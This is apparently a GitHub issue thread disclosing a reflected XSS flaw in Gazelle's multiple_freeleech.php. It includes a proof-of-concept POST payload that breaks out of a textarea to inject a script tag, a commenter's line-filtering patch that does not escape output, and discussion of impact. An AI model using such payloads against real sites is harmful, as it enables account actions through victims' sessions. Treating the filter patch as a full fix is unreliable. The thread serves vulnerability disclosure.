xss_3

[xjzzzxx]

Hello,

I would like to report for a XSS vulnerability in gazelle commit 63b3370

In file https://github.com/WhatCD/Gazelle/blob/master/sections/tools/managers/multiple_freeleech.php

...
<textarea name="torrents" style="width: 95%; height: 200px;"><?=$_POST['torrents']?></textarea><br /><br />			// Line 96
...

Source from $_POST['torrents'] without any filtering or checking which resulting in XSS.

Poc

POST /sections/tools/managers/multiple_freeleech.php

With the Data

torrents=</textarea>%3Cscript%3Ealert(1);%3C/script%3E<textarea>

Manual verification

BTW，cms.gazelle.com in local（changes hosts）

[aaronhenderson]

Same as my comment submitted two instances ago; as an old timer who began in gazelle, codeigniter and laravel I applaud your analysis and disclosure.

[dalilgriffith]

This one is of low importance. User would have to have users_mod permission to access this. I did circumvent this:

This is very simple. A proper regex implementation would further insure proper validation.

if (isset($_POST['torrents'])) {
    $GroupIDs = array();
    $Elements = explode("\r\n", $_POST['torrents']);
    foreach ($Elements as $EKey => $Element) {
        // Get all of the torrent IDs
        if (strpos($Element, "torrents.php") !== false) {
            $Data = explode("id=", $Element);
            if (!empty($Data[1])) {
                $GroupIDs[] = (int) $Data[1];
            }
        } else if (strpos($Element, "collages.php") !== false) {
            $Data = explode("id=", $Element);
            if (!empty($Data[1])) {
                $CollageID = (int) $Data[1];
                $DB->query("
                    SELECT GroupID
                    FROM collages_torrents
                    WHERE CollageID = '$CollageID'");
                while (list($GroupID) = $DB->next_record()) {
                    $GroupIDs[] = (int) $GroupID;
                }
            }
        } else {
			unset($Elements[$EKey]);
		}
    }

	$_POST['torrents'] = implode("\r\n",$Elements);

[arthur4ires]

@dalilgriffith

I agree with you if we evaluate the vulnerability based on CVSS (https://www.first.org/cvss), since PR would be equal to Low.

But note that XSS has an impact because the attacker, with a click from a moderator, could perform any action by the moderator.

So, if this attack is targeted, it has a relevant impact.